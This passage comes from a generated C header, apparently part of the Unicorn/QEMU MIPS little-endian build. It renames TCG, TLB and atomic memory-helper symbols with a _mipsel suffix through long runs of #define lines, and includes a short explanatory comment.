tcg_gen_deposit_i64_mipsel #define tcg_gen_deposit_z_i64 tcg_gen_deposit_z_i64_mipsel #define tcg_gen_extract_i64 tcg_gen_extract_i64_mipsel #define tcg_gen_sextract_i64 tcg_gen_sextract_i64_mipsel #define tcg_gen_extract2_i64 tcg_gen_extract2_i64_mipsel #define tcg_gen_movcond_i64 tcg_gen_movcond_i64_mipsel #define tcg_gen_add2_i64 tcg_gen_add2_i64_mipsel #define tcg_gen_sub2_i64 tcg_gen_sub2_i64_mipsel #define tcg_gen_mulu2_i64 tcg_gen_mulu2_i64_mipsel #define tcg_gen_muls2_i64 tcg_gen_muls2_i64_mipsel #define tcg_gen_mulsu2_i64 tcg_gen_mulsu2_i64_mipsel #define tcg_gen_smin_i64 tcg_gen_smin_i64_mipsel #define tcg_gen_umin_i64 tcg_gen_umin_i64_mipsel #define tcg_gen_smax_i64 tcg_gen_smax_i64_mipsel #define tcg_gen_umax_i64 tcg_gen_umax_i64_mipsel #define tcg_gen_abs_i64 tcg_gen_abs_i64_mipsel #define tcg_gen_extrl_i64_i32 tcg_gen_extrl_i64_i32_mipsel #define tcg_gen_extrh_i64_i32 tcg_gen_extrh_i64_i32_mipsel #define tcg_gen_extu_i32_i64 tcg_gen_extu_i32_i64_mipsel #define tcg_gen_ext_i32_i64 tcg_gen_ext_i32_i64_mipsel #define tcg_gen_concat_i32_i64 tcg_gen_concat_i32_i64_mipsel #define tcg_gen_extr_i64_i32 tcg_gen_extr_i64_i32_mipsel #define tcg_gen_extr32_i64 tcg_gen_extr32_i64_mipsel #define tcg_gen_exit_tb tcg_gen_exit_tb_mipsel #define tcg_gen_goto_tb tcg_gen_goto_tb_mipsel #define tcg_gen_lookup_and_goto_ptr tcg_gen_lookup_and_goto_ptr_mipsel #define check_exit_request check_exit_request_mipsel #define tcg_gen_qemu_ld_i32 tcg_gen_qemu_ld_i32_mipsel #define tcg_gen_qemu_st_i32 tcg_gen_qemu_st_i32_mipsel #define tcg_gen_qemu_ld_i64 tcg_gen_qemu_ld_i64_mipsel #define tcg_gen_qemu_st_i64 tcg_gen_qemu_st_i64_mipsel #define tcg_gen_atomic_cmpxchg_i32 tcg_gen_atomic_cmpxchg_i32_mipsel #define tcg_gen_atomic_cmpxchg_i64 tcg_gen_atomic_cmpxchg_i64_mipsel #define tcg_gen_atomic_fetch_add_i32 tcg_gen_atomic_fetch_add_i32_mipsel #define tcg_gen_atomic_fetch_add_i64 tcg_gen_atomic_fetch_add_i64_mipsel #define tcg_gen_atomic_fetch_and_i32 tcg_gen_atomic_fetch_and_i32_mipsel #define tcg_gen_atomic_fetch_and_i64 tcg_gen_atomic_fetch_and_i64_mipsel #define tcg_gen_atomic_fetch_or_i32 tcg_gen_atomic_fetch_or_i32_mipsel #define tcg_gen_atomic_fetch_or_i64 tcg_gen_atomic_fetch_or_i64_mipsel #define tcg_gen_atomic_fetch_xor_i32 tcg_gen_atomic_fetch_xor_i32_mipsel #define tcg_gen_atomic_fetch_xor_i64 tcg_gen_atomic_fetch_xor_i64_mipsel #define tcg_gen_atomic_fetch_smin_i32 tcg_gen_atomic_fetch_smin_i32_mipsel #define tcg_gen_atomic_fetch_smin_i64 tcg_gen_atomic_fetch_smin_i64_mipsel #define tcg_gen_atomic_fetch_umin_i32 tcg_gen_atomic_fetch_umin_i32_mipsel #define tcg_gen_atomic_fetch_umin_i64 tcg_gen_atomic_fetch_umin_i64_mipsel #define tcg_gen_atomic_fetch_smax_i32 tcg_gen_atomic_fetch_smax_i32_mipsel #define tcg_gen_atomic_fetch_smax_i64 tcg_gen_atomic_fetch_smax_i64_mipsel #define tcg_gen_atomic_fetch_umax_i32 tcg_gen_atomic_fetch_umax_i32_mipsel #define tcg_gen_atomic_fetch_umax_i64 tcg_gen_atomic_fetch_umax_i64_mipsel #define tcg_gen_atomic_add_fetch_i32 tcg_gen_atomic_add_fetch_i32_mipsel #define tcg_gen_atomic_add_fetch_i64 tcg_gen_atomic_add_fetch_i64_mipsel #define tcg_gen_atomic_and_fetch_i32 tcg_gen_atomic_and_fetch_i32_mipsel #define tcg_gen_atomic_and_fetch_i64 tcg_gen_atomic_and_fetch_i64_mipsel #define tcg_gen_atomic_or_fetch_i32 tcg_gen_atomic_or_fetch_i32_mipsel #define tcg_gen_atomic_or_fetch_i64 tcg_gen_atomic_or_fetch_i64_mipsel #define tcg_gen_atomic_xor_fetch_i32 tcg_gen_atomic_xor_fetch_i32_mipsel #define tcg_gen_atomic_xor_fetch_i64 tcg_gen_atomic_xor_fetch_i64_mipsel #define 
tcg_gen_atomic_smin_fetch_i32 tcg_gen_atomic_smin_fetch_i32_mipsel #define tcg_gen_atomic_smin_fetch_i64 tcg_gen_atomic_smin_fetch_i64_mipsel #define tcg_gen_atomic_umin_fetch_i32 tcg_gen_atomic_umin_fetch_i32_mipsel #define tcg_gen_atomic_umin_fetch_i64 tcg_gen_atomic_umin_fetch_i64_mipsel #define tcg_gen_atomic_smax_fetch_i32 tcg_gen_atomic_smax_fetch_i32_mipsel #define tcg_gen_atomic_smax_fetch_i64 tcg_gen_atomic_smax_fetch_i64_mipsel #define tcg_gen_atomic_umax_fetch_i32 tcg_gen_atomic_umax_fetch_i32_mipsel #define tcg_gen_atomic_umax_fetch_i64 tcg_gen_atomic_umax_fetch_i64_mipsel #define tcg_gen_atomic_xchg_i32 tcg_gen_atomic_xchg_i32_mipsel #define tcg_gen_atomic_xchg_i64 tcg_gen_atomic_xchg_i64_mipsel #define simd_desc simd_desc_mipsel #define tcg_gen_gvec_2_ool tcg_gen_gvec_2_ool_mipsel #define tcg_gen_gvec_2i_ool tcg_gen_gvec_2i_ool_mipsel #define tcg_gen_gvec_3_ool tcg_gen_gvec_3_ool_mipsel #define tcg_gen_gvec_4_ool tcg_gen_gvec_4_ool_mipsel #define tcg_gen_gvec_5_ool tcg_gen_gvec_5_ool_mipsel #define tcg_gen_gvec_2_ptr tcg_gen_gvec_2_ptr_mipsel #define tcg_gen_gvec_3_ptr tcg_gen_gvec_3_ptr_mipsel #define tcg_gen_gvec_4_ptr tcg_gen_gvec_4_ptr_mipsel #define tcg_gen_gvec_5_ptr tcg_gen_gvec_5_ptr_mipsel #define tcg_gen_gvec_2 tcg_gen_gvec_2_mipsel #define tcg_gen_gvec_2i tcg_gen_gvec_2i_mipsel #define tcg_gen_gvec_2s tcg_gen_gvec_2s_mipsel #define tcg_gen_gvec_3 tcg_gen_gvec_3_mipsel #define tcg_gen_gvec_3i tcg_gen_gvec_3i_mipsel #define tcg_gen_gvec_4 tcg_gen_gvec_4_mipsel #define tcg_gen_gvec_mov tcg_gen_gvec_mov_mipsel #define tcg_gen_gvec_dup_i32 tcg_gen_gvec_dup_i32_mipsel #define tcg_gen_gvec_dup_i64 tcg_gen_gvec_dup_i64_mipsel #define tcg_gen_gvec_dup_mem tcg_gen_gvec_dup_mem_mipsel #define tcg_gen_gvec_dup64i tcg_gen_gvec_dup64i_mipsel #define tcg_gen_gvec_dup32i tcg_gen_gvec_dup32i_mipsel #define tcg_gen_gvec_dup16i tcg_gen_gvec_dup16i_mipsel #define tcg_gen_gvec_dup8i tcg_gen_gvec_dup8i_mipsel #define tcg_gen_gvec_not tcg_gen_gvec_not_mipsel #define tcg_gen_vec_add8_i64 tcg_gen_vec_add8_i64_mipsel #define tcg_gen_vec_add16_i64 tcg_gen_vec_add16_i64_mipsel #define tcg_gen_vec_add32_i64 tcg_gen_vec_add32_i64_mipsel #define tcg_gen_gvec_add tcg_gen_gvec_add_mipsel #define tcg_gen_gvec_adds tcg_gen_gvec_adds_mipsel #define tcg_gen_gvec_addi tcg_gen_gvec_addi_mipsel #define tcg_gen_gvec_subs tcg_gen_gvec_subs_mipsel #define tcg_gen_vec_sub8_i64 tcg_gen_vec_sub8_i64_mipsel #define tcg_gen_vec_sub16_i64 tcg_gen_vec_sub16_i64_mipsel #define tcg_gen_vec_sub32_i64 tcg_gen_vec_sub32_i64_mipsel #define tcg_gen_gvec_sub tcg_gen_gvec_sub_mipsel #define tcg_gen_gvec_mul tcg_gen_gvec_mul_mipsel #define tcg_gen_gvec_muls tcg_gen_gvec_muls_mipsel #define tcg_gen_gvec_muli tcg_gen_gvec_muli_mipsel #define tcg_gen_gvec_ssadd tcg_gen_gvec_ssadd_mipsel #define tcg_gen_gvec_sssub tcg_gen_gvec_sssub_mipsel #define tcg_gen_gvec_usadd tcg_gen_gvec_usadd_mipsel #define tcg_gen_gvec_ussub tcg_gen_gvec_ussub_mipsel #define tcg_gen_gvec_smin tcg_gen_gvec_smin_mipsel #define tcg_gen_gvec_umin tcg_gen_gvec_umin_mipsel #define tcg_gen_gvec_smax tcg_gen_gvec_smax_mipsel #define tcg_gen_gvec_umax tcg_gen_gvec_umax_mipsel #define tcg_gen_vec_neg8_i64 tcg_gen_vec_neg8_i64_mipsel #define tcg_gen_vec_neg16_i64 tcg_gen_vec_neg16_i64_mipsel #define tcg_gen_vec_neg32_i64 tcg_gen_vec_neg32_i64_mipsel #define tcg_gen_gvec_neg tcg_gen_gvec_neg_mipsel #define tcg_gen_gvec_abs tcg_gen_gvec_abs_mipsel #define tcg_gen_gvec_and tcg_gen_gvec_and_mipsel #define tcg_gen_gvec_or tcg_gen_gvec_or_mipsel #define 
tcg_gen_gvec_xor tcg_gen_gvec_xor_mipsel #define tcg_gen_gvec_andc tcg_gen_gvec_andc_mipsel #define tcg_gen_gvec_orc tcg_gen_gvec_orc_mipsel #define tcg_gen_gvec_nand tcg_gen_gvec_nand_mipsel #define tcg_gen_gvec_nor tcg_gen_gvec_nor_mipsel #define tcg_gen_gvec_eqv tcg_gen_gvec_eqv_mipsel #define tcg_gen_gvec_ands tcg_gen_gvec_ands_mipsel #define tcg_gen_gvec_andi tcg_gen_gvec_andi_mipsel #define tcg_gen_gvec_xors tcg_gen_gvec_xors_mipsel #define tcg_gen_gvec_xori tcg_gen_gvec_xori_mipsel #define tcg_gen_gvec_ors tcg_gen_gvec_ors_mipsel #define tcg_gen_gvec_ori tcg_gen_gvec_ori_mipsel #define tcg_gen_vec_shl8i_i64 tcg_gen_vec_shl8i_i64_mipsel #define tcg_gen_vec_shl16i_i64 tcg_gen_vec_shl16i_i64_mipsel #define tcg_gen_gvec_shli tcg_gen_gvec_shli_mipsel #define tcg_gen_vec_shr8i_i64 tcg_gen_vec_shr8i_i64_mipsel #define tcg_gen_vec_shr16i_i64 tcg_gen_vec_shr16i_i64_mipsel #define tcg_gen_gvec_shri tcg_gen_gvec_shri_mipsel #define tcg_gen_vec_sar8i_i64 tcg_gen_vec_sar8i_i64_mipsel #define tcg_gen_vec_sar16i_i64 tcg_gen_vec_sar16i_i64_mipsel #define tcg_gen_gvec_sari tcg_gen_gvec_sari_mipsel #define tcg_gen_gvec_shls tcg_gen_gvec_shls_mipsel #define tcg_gen_gvec_shrs tcg_gen_gvec_shrs_mipsel #define tcg_gen_gvec_sars tcg_gen_gvec_sars_mipsel #define tcg_gen_gvec_shlv tcg_gen_gvec_shlv_mipsel #define tcg_gen_gvec_shrv tcg_gen_gvec_shrv_mipsel #define tcg_gen_gvec_sarv tcg_gen_gvec_sarv_mipsel #define tcg_gen_gvec_cmp tcg_gen_gvec_cmp_mipsel #define tcg_gen_gvec_bitsel tcg_gen_gvec_bitsel_mipsel #define tcg_can_emit_vecop_list tcg_can_emit_vecop_list_mipsel #define vec_gen_2 vec_gen_2_mipsel #define vec_gen_3 vec_gen_3_mipsel #define vec_gen_4 vec_gen_4_mipsel #define tcg_gen_mov_vec tcg_gen_mov_vec_mipsel #define tcg_const_zeros_vec tcg_const_zeros_vec_mipsel #define tcg_const_ones_vec tcg_const_ones_vec_mipsel #define tcg_const_zeros_vec_matching tcg_const_zeros_vec_matching_mipsel #define tcg_const_ones_vec_matching tcg_const_ones_vec_matching_mipsel #define tcg_gen_dup64i_vec tcg_gen_dup64i_vec_mipsel #define tcg_gen_dup32i_vec tcg_gen_dup32i_vec_mipsel #define tcg_gen_dup16i_vec tcg_gen_dup16i_vec_mipsel #define tcg_gen_dup8i_vec tcg_gen_dup8i_vec_mipsel #define tcg_gen_dupi_vec tcg_gen_dupi_vec_mipsel #define tcg_gen_dup_i64_vec tcg_gen_dup_i64_vec_mipsel #define tcg_gen_dup_i32_vec tcg_gen_dup_i32_vec_mipsel #define tcg_gen_dup_mem_vec tcg_gen_dup_mem_vec_mipsel #define tcg_gen_ld_vec tcg_gen_ld_vec_mipsel #define tcg_gen_st_vec tcg_gen_st_vec_mipsel #define tcg_gen_stl_vec tcg_gen_stl_vec_mipsel #define tcg_gen_and_vec tcg_gen_and_vec_mipsel #define tcg_gen_or_vec tcg_gen_or_vec_mipsel #define tcg_gen_xor_vec tcg_gen_xor_vec_mipsel #define tcg_gen_andc_vec tcg_gen_andc_vec_mipsel #define tcg_gen_orc_vec tcg_gen_orc_vec_mipsel #define tcg_gen_nand_vec tcg_gen_nand_vec_mipsel #define tcg_gen_nor_vec tcg_gen_nor_vec_mipsel #define tcg_gen_eqv_vec tcg_gen_eqv_vec_mipsel #define tcg_gen_not_vec tcg_gen_not_vec_mipsel #define tcg_gen_neg_vec tcg_gen_neg_vec_mipsel #define tcg_gen_abs_vec tcg_gen_abs_vec_mipsel #define tcg_gen_shli_vec tcg_gen_shli_vec_mipsel #define tcg_gen_shri_vec tcg_gen_shri_vec_mipsel #define tcg_gen_sari_vec tcg_gen_sari_vec_mipsel #define tcg_gen_cmp_vec tcg_gen_cmp_vec_mipsel #define tcg_gen_add_vec tcg_gen_add_vec_mipsel #define tcg_gen_sub_vec tcg_gen_sub_vec_mipsel #define tcg_gen_mul_vec tcg_gen_mul_vec_mipsel #define tcg_gen_ssadd_vec tcg_gen_ssadd_vec_mipsel #define tcg_gen_usadd_vec tcg_gen_usadd_vec_mipsel #define tcg_gen_sssub_vec tcg_gen_sssub_vec_mipsel 
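/*
 * Editor's note (a sketch, not part of the generated header): every
 * #define in this file follows the same machine-generated pattern,
 *
 *     #define <qemu_symbol> <qemu_symbol>_mipsel
 *
 * which renames each TCG/QEMU symbol at compile time so the same
 * sources can be built once per emulated target and linked into a
 * single Unicorn library without symbol collisions. A call site such
 * as
 *
 *     tcg_gen_add_i32(tcg_ctx, dst, a, b);   // argument list illustrative
 *
 * compiled with this header in force therefore references
 * tcg_gen_add_i32_mipsel; the big-endian MIPS build uses a sibling
 * header that applies a _mips suffix instead.
 */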
#define tcg_gen_ussub_vec tcg_gen_ussub_vec_mipsel #define tcg_gen_smin_vec tcg_gen_smin_vec_mipsel #define tcg_gen_umin_vec tcg_gen_umin_vec_mipsel #define tcg_gen_smax_vec tcg_gen_smax_vec_mipsel #define tcg_gen_umax_vec tcg_gen_umax_vec_mipsel #define tcg_gen_shlv_vec tcg_gen_shlv_vec_mipsel #define tcg_gen_shrv_vec tcg_gen_shrv_vec_mipsel #define tcg_gen_sarv_vec tcg_gen_sarv_vec_mipsel #define tcg_gen_shls_vec tcg_gen_shls_vec_mipsel #define tcg_gen_shrs_vec tcg_gen_shrs_vec_mipsel #define tcg_gen_sars_vec tcg_gen_sars_vec_mipsel #define tcg_gen_bitsel_vec tcg_gen_bitsel_vec_mipsel #define tcg_gen_cmpsel_vec tcg_gen_cmpsel_vec_mipsel #define tb_htable_lookup tb_htable_lookup_mipsel #define tb_set_jmp_target tb_set_jmp_target_mipsel #define cpu_exec cpu_exec_mipsel #define cpu_loop_exit_noexc cpu_loop_exit_noexc_mipsel #define cpu_reloading_memory_map cpu_reloading_memory_map_mipsel #define cpu_loop_exit cpu_loop_exit_mipsel #define cpu_loop_exit_restore cpu_loop_exit_restore_mipsel #define cpu_loop_exit_atomic cpu_loop_exit_atomic_mipsel #define tlb_init tlb_init_mipsel #define tlb_flush_by_mmuidx tlb_flush_by_mmuidx_mipsel #define tlb_flush tlb_flush_mipsel #define tlb_flush_by_mmuidx_all_cpus tlb_flush_by_mmuidx_all_cpus_mipsel #define tlb_flush_all_cpus tlb_flush_all_cpus_mipsel #define tlb_flush_by_mmuidx_all_cpus_synced tlb_flush_by_mmuidx_all_cpus_synced_mipsel #define tlb_flush_all_cpus_synced tlb_flush_all_cpus_synced_mipsel #define tlb_flush_page_by_mmuidx tlb_flush_page_by_mmuidx_mipsel #define tlb_flush_page tlb_flush_page_mipsel #define tlb_flush_page_by_mmuidx_all_cpus tlb_flush_page_by_mmuidx_all_cpus_mipsel #define tlb_flush_page_all_cpus tlb_flush_page_all_cpus_mipsel #define tlb_flush_page_by_mmuidx_all_cpus_synced tlb_flush_page_by_mmuidx_all_cpus_synced_mipsel #define tlb_flush_page_all_cpus_synced tlb_flush_page_all_cpus_synced_mipsel #define tlb_protect_code tlb_protect_code_mipsel #define tlb_unprotect_code tlb_unprotect_code_mipsel #define tlb_reset_dirty tlb_reset_dirty_mipsel #define tlb_set_dirty tlb_set_dirty_mipsel #define tlb_set_page_with_attrs tlb_set_page_with_attrs_mipsel #define tlb_set_page tlb_set_page_mipsel #define get_page_addr_code_hostp get_page_addr_code_hostp_mipsel #define get_page_addr_code get_page_addr_code_mipsel #define probe_access probe_access_mipsel #define tlb_vaddr_to_host tlb_vaddr_to_host_mipsel #define helper_ret_ldub_mmu helper_ret_ldub_mmu_mipsel #define helper_le_lduw_mmu helper_le_lduw_mmu_mipsel #define helper_be_lduw_mmu helper_be_lduw_mmu_mipsel #define helper_le_ldul_mmu helper_le_ldul_mmu_mipsel #define helper_be_ldul_mmu helper_be_ldul_mmu_mipsel #define helper_le_ldq_mmu helper_le_ldq_mmu_mipsel #define helper_be_ldq_mmu helper_be_ldq_mmu_mipsel #define helper_ret_ldsb_mmu helper_ret_ldsb_mmu_mipsel #define helper_le_ldsw_mmu helper_le_ldsw_mmu_mipsel #define helper_be_ldsw_mmu helper_be_ldsw_mmu_mipsel #define helper_le_ldsl_mmu helper_le_ldsl_mmu_mipsel #define helper_be_ldsl_mmu helper_be_ldsl_mmu_mipsel #define cpu_ldub_mmuidx_ra cpu_ldub_mmuidx_ra_mipsel #define cpu_ldsb_mmuidx_ra cpu_ldsb_mmuidx_ra_mipsel #define cpu_lduw_mmuidx_ra cpu_lduw_mmuidx_ra_mipsel #define cpu_ldsw_mmuidx_ra cpu_ldsw_mmuidx_ra_mipsel #define cpu_ldl_mmuidx_ra cpu_ldl_mmuidx_ra_mipsel #define cpu_ldq_mmuidx_ra cpu_ldq_mmuidx_ra_mipsel #define cpu_ldub_data_ra cpu_ldub_data_ra_mipsel #define cpu_ldsb_data_ra cpu_ldsb_data_ra_mipsel #define cpu_lduw_data_ra cpu_lduw_data_ra_mipsel #define cpu_ldsw_data_ra cpu_ldsw_data_ra_mipsel #define 
cpu_ldl_data_ra cpu_ldl_data_ra_mipsel #define cpu_ldq_data_ra cpu_ldq_data_ra_mipsel #define cpu_ldub_data cpu_ldub_data_mipsel #define cpu_ldsb_data cpu_ldsb_data_mipsel #define cpu_lduw_data cpu_lduw_data_mipsel #define cpu_ldsw_data cpu_ldsw_data_mipsel #define cpu_ldl_data cpu_ldl_data_mipsel #define cpu_ldq_data cpu_ldq_data_mipsel #define helper_ret_stb_mmu helper_ret_stb_mmu_mipsel #define helper_le_stw_mmu helper_le_stw_mmu_mipsel #define helper_be_stw_mmu helper_be_stw_mmu_mipsel #define helper_le_stl_mmu helper_le_stl_mmu_mipsel #define helper_be_stl_mmu helper_be_stl_mmu_mipsel #define helper_le_stq_mmu helper_le_stq_mmu_mipsel #define helper_be_stq_mmu helper_be_stq_mmu_mipsel #define cpu_stb_mmuidx_ra cpu_stb_mmuidx_ra_mipsel #define cpu_stw_mmuidx_ra cpu_stw_mmuidx_ra_mipsel #define cpu_stl_mmuidx_ra cpu_stl_mmuidx_ra_mipsel #define cpu_stq_mmuidx_ra cpu_stq_mmuidx_ra_mipsel #define cpu_stb_data_ra cpu_stb_data_ra_mipsel #define cpu_stw_data_ra cpu_stw_data_ra_mipsel #define cpu_stl_data_ra cpu_stl_data_ra_mipsel #define cpu_stq_data_ra cpu_stq_data_ra_mipsel #define cpu_stb_data cpu_stb_data_mipsel #define cpu_stw_data cpu_stw_data_mipsel #define cpu_stl_data cpu_stl_data_mipsel #define cpu_stq_data cpu_stq_data_mipsel #define helper_atomic_cmpxchgb_mmu helper_atomic_cmpxchgb_mmu_mipsel #define helper_atomic_xchgb_mmu helper_atomic_xchgb_mmu_mipsel #define helper_atomic_fetch_addb_mmu helper_atomic_fetch_addb_mmu_mipsel #define helper_atomic_fetch_andb_mmu helper_atomic_fetch_andb_mmu_mipsel #define helper_atomic_fetch_orb_mmu helper_atomic_fetch_orb_mmu_mipsel #define helper_atomic_fetch_xorb_mmu helper_atomic_fetch_xorb_mmu_mipsel #define helper_atomic_add_fetchb_mmu helper_atomic_add_fetchb_mmu_mipsel #define helper_atomic_and_fetchb_mmu helper_atomic_and_fetchb_mmu_mipsel #define helper_atomic_or_fetchb_mmu helper_atomic_or_fetchb_mmu_mipsel #define helper_atomic_xor_fetchb_mmu helper_atomic_xor_fetchb_mmu_mipsel #define helper_atomic_fetch_sminb_mmu helper_atomic_fetch_sminb_mmu_mipsel #define helper_atomic_fetch_uminb_mmu helper_atomic_fetch_uminb_mmu_mipsel #define helper_atomic_fetch_smaxb_mmu helper_atomic_fetch_smaxb_mmu_mipsel #define helper_atomic_fetch_umaxb_mmu helper_atomic_fetch_umaxb_mmu_mipsel #define helper_atomic_smin_fetchb_mmu helper_atomic_smin_fetchb_mmu_mipsel #define helper_atomic_umin_fetchb_mmu helper_atomic_umin_fetchb_mmu_mipsel #define helper_atomic_smax_fetchb_mmu helper_atomic_smax_fetchb_mmu_mipsel #define helper_atomic_umax_fetchb_mmu helper_atomic_umax_fetchb_mmu_mipsel #define helper_atomic_cmpxchgw_le_mmu helper_atomic_cmpxchgw_le_mmu_mipsel #define helper_atomic_xchgw_le_mmu helper_atomic_xchgw_le_mmu_mipsel #define helper_atomic_fetch_addw_le_mmu helper_atomic_fetch_addw_le_mmu_mipsel #define helper_atomic_fetch_andw_le_mmu helper_atomic_fetch_andw_le_mmu_mipsel #define helper_atomic_fetch_orw_le_mmu helper_atomic_fetch_orw_le_mmu_mipsel #define helper_atomic_fetch_xorw_le_mmu helper_atomic_fetch_xorw_le_mmu_mipsel #define helper_atomic_add_fetchw_le_mmu helper_atomic_add_fetchw_le_mmu_mipsel #define helper_atomic_and_fetchw_le_mmu helper_atomic_and_fetchw_le_mmu_mipsel #define helper_atomic_or_fetchw_le_mmu helper_atomic_or_fetchw_le_mmu_mipsel #define helper_atomic_xor_fetchw_le_mmu helper_atomic_xor_fetchw_le_mmu_mipsel #define helper_atomic_fetch_sminw_le_mmu helper_atomic_fetch_sminw_le_mmu_mipsel #define helper_atomic_fetch_uminw_le_mmu helper_atomic_fetch_uminw_le_mmu_mipsel #define helper_atomic_fetch_smaxw_le_mmu 
helper_atomic_fetch_smaxw_le_mmu_mipsel #define helper_atomic_fetch_umaxw_le_mmu helper_atomic_fetch_umaxw_le_mmu_mipsel #define helper_atomic_smin_fetchw_le_mmu helper_atomic_smin_fetchw_le_mmu_mipsel #define helper_atomic_umin_fetchw_le_mmu helper_atomic_umin_fetchw_le_mmu_mipsel #define helper_atomic_smax_fetchw_le_mmu helper_atomic_smax_fetchw_le_mmu_mipsel #define helper_atomic_umax_fetchw_le_mmu helper_atomic_umax_fetchw_le_mmu_mipsel #define helper_atomic_cmpxchgw_be_mmu helper_atomic_cmpxchgw_be_mmu_mipsel #define helper_atomic_xchgw_be_mmu helper_atomic_xchgw_be_mmu_mipsel #define helper_atomic_fetch_andw_be_mmu helper_atomic_fetch_andw_be_mmu_mipsel #define helper_atomic_fetch_orw_be_mmu helper_atomic_fetch_orw_be_mmu_mipsel #define helper_atomic_fetch_xorw_be_mmu helper_atomic_fetch_xorw_be_mmu_mipsel #define helper_atomic_and_fetchw_be_mmu helper_atomic_and_fetchw_be_mmu_mipsel #define helper_atomic_or_fetchw_be_mmu helper_atomic_or_fetchw_be_mmu_mipsel #define helper_atomic_xor_fetchw_be_mmu helper_atomic_xor_fetchw_be_mmu_mipsel #define helper_atomic_fetch_sminw_be_mmu helper_atomic_fetch_sminw_be_mmu_mipsel #define helper_atomic_fetch_uminw_be_mmu helper_atomic_fetch_uminw_be_mmu_mipsel #define helper_atomic_fetch_smaxw_be_mmu helper_atomic_fetch_smaxw_be_mmu_mipsel #define helper_atomic_fetch_umaxw_be_mmu helper_atomic_fetch_umaxw_be_mmu_mipsel #define helper_atomic_smin_fetchw_be_mmu helper_atomic_smin_fetchw_be_mmu_mipsel #define helper_atomic_umin_fetchw_be_mmu helper_atomic_umin_fetchw_be_mmu_mipsel #define helper_atomic_smax_fetchw_be_mmu helper_atomic_smax_fetchw_be_mmu_mipsel #define helper_atomic_umax_fetchw_be_mmu helper_atomic_umax_fetchw_be_mmu_mipsel #define helper_atomic_fetch_addw_be_mmu helper_atomic_fetch_addw_be_mmu_mipsel #define helper_atomic_add_fetchw_be_mmu helper_atomic_add_fetchw_be_mmu_mipsel #define helper_atomic_cmpxchgl_le_mmu helper_atomic_cmpxchgl_le_mmu_mipsel #define helper_atomic_xchgl_le_mmu helper_atomic_xchgl_le_mmu_mipsel #define helper_atomic_fetch_addl_le_mmu helper_atomic_fetch_addl_le_mmu_mipsel #define helper_atomic_fetch_andl_le_mmu helper_atomic_fetch_andl_le_mmu_mipsel #define helper_atomic_fetch_orl_le_mmu helper_atomic_fetch_orl_le_mmu_mipsel #define helper_atomic_fetch_xorl_le_mmu helper_atomic_fetch_xorl_le_mmu_mipsel #define helper_atomic_add_fetchl_le_mmu helper_atomic_add_fetchl_le_mmu_mipsel #define helper_atomic_and_fetchl_le_mmu helper_atomic_and_fetchl_le_mmu_mipsel #define helper_atomic_or_fetchl_le_mmu helper_atomic_or_fetchl_le_mmu_mipsel #define helper_atomic_xor_fetchl_le_mmu helper_atomic_xor_fetchl_le_mmu_mipsel #define helper_atomic_fetch_sminl_le_mmu helper_atomic_fetch_sminl_le_mmu_mipsel #define helper_atomic_fetch_uminl_le_mmu helper_atomic_fetch_uminl_le_mmu_mipsel #define helper_atomic_fetch_smaxl_le_mmu helper_atomic_fetch_smaxl_le_mmu_mipsel #define helper_atomic_fetch_umaxl_le_mmu helper_atomic_fetch_umaxl_le_mmu_mipsel #define helper_atomic_smin_fetchl_le_mmu helper_atomic_smin_fetchl_le_mmu_mipsel #define helper_atomic_umin_fetchl_le_mmu helper_atomic_umin_fetchl_le_mmu_mipsel #define helper_atomic_smax_fetchl_le_mmu helper_atomic_smax_fetchl_le_mmu_mipsel #define helper_atomic_umax_fetchl_le_mmu helper_atomic_umax_fetchl_le_mmu_mipsel #define helper_atomic_cmpxchgl_be_mmu helper_atomic_cmpxchgl_be_mmu_mipsel #define helper_atomic_xchgl_be_mmu helper_atomic_xchgl_be_mmu_mipsel #define helper_atomic_fetch_andl_be_mmu helper_atomic_fetch_andl_be_mmu_mipsel #define helper_atomic_fetch_orl_be_mmu 
helper_atomic_fetch_orl_be_mmu_mipsel #define helper_atomic_fetch_xorl_be_mmu helper_atomic_fetch_xorl_be_mmu_mipsel #define helper_atomic_and_fetchl_be_mmu helper_atomic_and_fetchl_be_mmu_mipsel #define helper_atomic_or_fetchl_be_mmu helper_atomic_or_fetchl_be_mmu_mipsel #define helper_atomic_xor_fetchl_be_mmu helper_atomic_xor_fetchl_be_mmu_mipsel #define helper_atomic_fetch_sminl_be_mmu helper_atomic_fetch_sminl_be_mmu_mipsel #define helper_atomic_fetch_uminl_be_mmu helper_atomic_fetch_uminl_be_mmu_mipsel #define helper_atomic_fetch_smaxl_be_mmu helper_atomic_fetch_smaxl_be_mmu_mipsel #define helper_atomic_fetch_umaxl_be_mmu helper_atomic_fetch_umaxl_be_mmu_mipsel #define helper_atomic_smin_fetchl_be_mmu helper_atomic_smin_fetchl_be_mmu_mipsel #define helper_atomic_umin_fetchl_be_mmu helper_atomic_umin_fetchl_be_mmu_mipsel #define helper_atomic_smax_fetchl_be_mmu helper_atomic_smax_fetchl_be_mmu_mipsel #define helper_atomic_umax_fetchl_be_mmu helper_atomic_umax_fetchl_be_mmu_mipsel #define helper_atomic_fetch_addl_be_mmu helper_atomic_fetch_addl_be_mmu_mipsel #define helper_atomic_add_fetchl_be_mmu helper_atomic_add_fetchl_be_mmu_mipsel #define helper_atomic_cmpxchgq_le_mmu helper_atomic_cmpxchgq_le_mmu_mipsel #define helper_atomic_xchgq_le_mmu helper_atomic_xchgq_le_mmu_mipsel #define helper_atomic_fetch_addq_le_mmu helper_atomic_fetch_addq_le_mmu_mipsel #define helper_atomic_fetch_andq_le_mmu helper_atomic_fetch_andq_le_mmu_mipsel #define helper_atomic_fetch_orq_le_mmu helper_atomic_fetch_orq_le_mmu_mipsel #define helper_atomic_fetch_xorq_le_mmu helper_atomic_fetch_xorq_le_mmu_mipsel #define helper_atomic_add_fetchq_le_mmu helper_atomic_add_fetchq_le_mmu_mipsel #define helper_atomic_and_fetchq_le_mmu helper_atomic_and_fetchq_le_mmu_mipsel #define helper_atomic_or_fetchq_le_mmu helper_atomic_or_fetchq_le_mmu_mipsel #define helper_atomic_xor_fetchq_le_mmu helper_atomic_xor_fetchq_le_mmu_mipsel #define helper_atomic_fetch_sminq_le_mmu helper_atomic_fetch_sminq_le_mmu_mipsel #define helper_atomic_fetch_uminq_le_mmu helper_atomic_fetch_uminq_le_mmu_mipsel #define helper_atomic_fetch_smaxq_le_mmu helper_atomic_fetch_smaxq_le_mmu_mipsel #define helper_atomic_fetch_umaxq_le_mmu helper_atomic_fetch_umaxq_le_mmu_mipsel #define helper_atomic_smin_fetchq_le_mmu helper_atomic_smin_fetchq_le_mmu_mipsel #define helper_atomic_umin_fetchq_le_mmu 